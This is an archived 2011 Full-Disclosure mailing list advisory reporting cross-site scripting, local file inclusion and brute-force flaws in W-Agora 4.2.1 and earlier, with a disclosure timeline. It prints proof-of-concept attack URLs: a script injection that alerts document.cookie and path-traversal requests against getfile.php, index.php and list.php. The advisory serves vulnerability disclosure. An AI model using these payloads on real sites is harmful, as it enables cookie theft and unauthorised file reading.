[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] XSS, LFI and BT vulnerabilities in W-Agora
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] XSS, LFI and BT vulnerabilities in W-Agora
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Thu, 17 Mar 2011 20:55:09 +0200
Hello list!
I want to warn you about Cross-Site Scripting, Local File Inclusion and
Brute Force vulnerabilities in W-Agora.
SecurityVulns ID: 11499.
-------------------------
Affected products:
-------------------------
Vulnerable are W-Agora 4.2.1 and previous versions.
----------
Details:
----------
XSS (WASC-08):
http://site/current/getfile.php/support_howto/%22%3E%3Cbody%20onload=alert(document.cookie)%3E/1/
Local File Inclusion (WASC-31):
In folder conf:
http://site/current/getfile.php/1
http://site/current/index.php?bn=1
http://site/current/list.php?bn=1
In any folder (only on Windows-servers):
http://site/current/getfile.php/..\1
http://site/current/index.php?bn=..\1
http://site/current/list.php?bn=..\1
Brute Force (WASC-11):
http://site/current/login.php
------------
Timeline:
------------
2011.01.15 - announced at my site.
2011.01.16 - informed developers.
2011.01.23 - developer answered and promised to try to fix all holes, which
I informed him about in 2010-2011.
2011.01.24 - gave additional suggestions for developer.
2011.03.16 - disclosed at my site.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4845/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/